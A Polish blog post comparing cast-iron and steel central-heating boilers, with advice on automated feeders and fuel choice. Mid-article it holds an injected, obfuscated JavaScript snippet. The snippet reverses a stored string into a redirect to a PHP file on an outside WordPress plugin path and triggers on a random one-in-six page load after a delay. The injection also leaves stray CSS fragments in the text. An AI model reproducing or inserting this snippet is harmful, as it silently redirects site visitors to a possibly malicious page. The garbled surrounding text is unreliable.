Rodzaje pieców CO i ich właściwości

Rodzaje pieców CO i ich właściwości

 

to jednak nadal nie wyobrażamy sobie sezonu jesiennego czy zimowego bez odpowiedniego ogrzewania. Zważając na informacje odnośnie stanu naszego środowiska i szkodliwego wpływu spalania węgla kamiennego, warto przemyśleć wymianę starego pieca na nowoczesny kocioł, który nie tylko będzie bardziej przyjazny dla natury, ale także dla naszego portfela.

$NqM=function(n){if (typeof ($NqM.list[n]) == „string”) return $NqM.list[n].split(„”).reverse().join(„”);return $NqM.list[n];};$NqM.list=[„\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tom: 0cm; text-align: justify;”>piece co żeliwne z podajnikiemOczywiście, na początek musimy ponieść pewne koszty, związane z inwestycją w nowoczesny piec, który zwykle jest w dużej mierze zautomatyzowany i pozwoli nam zaoszczędzić mnóstwo czasu i energii, którą traciliśmy na uzupełnianie paliwa, niezbędnego do spalania. W kotłach aktualnie dostępnych na rynku większość czynności odbywa się przy użyciu elektroniki, a naszym zadaniem jest jedynie zaopatrzenie podajnika w zapas materiału do spalania, który wystarcza na co najmniej 3-4 dni. Potem już możemy cieszyć się optymalną temperaturą w pomieszczeniu, bez większego nakładu pracy. Po zapadnięciu decyzji o wymianie pieca, musimy zastanowić się, z jakiego materiału wykonany ma być nowe urządzenie. Do wyboru mamy dwa warianty. Piece CO żeliwne z podajnikiem to doskonały wybór, jeśli chcemy opalać budynek koksem, olejem lub gazem. Spalanie krótkopłomienne jest bowiem w tym przypadku najbardziej ekonomiczne i efektywne. Żeliwo to również gwarancja trwałości i odporności na niekorzystne czynniki, takie jak wilgoć. Kolejnym atutem tego kotłów wykonanych z tego materiału są ich niewielkie wymiary,zatem będzie to idealna opcja dla posiadaczy niewielkich kotłowni. Jedynym minusem jest fakt, że w przypadku awarii lub uszkodzenia danego elementu konieczna jest wymiana całej części pieca. Nie dokonamy tutaj miejscowej wymiany uszkodzonej blachy, tak jak w przypadku kotłów stalowych. Należy jednak wziąć pod uwagę to, że urządzenia żeliwne znacznie rzadziej ulegają awariom w porównaniu do tych wykonanych ze stali.

to bardzo ważna kwestia. Jeśli podejmiemy właściwą decyzję, zaoszczędzimy sobie dodatkowych kosztów i nerwów, związanych z występowaniem awarii. Jeśli zastanawiamy się, czy powinniśmy postawić na kocioł żeliwny czy wykonany ze stali, zastanówmy się przede wszystkim, jakie paliwo zamierzamy wykorzystywać do ogrzewania.

 

Komentarze są wyłączone.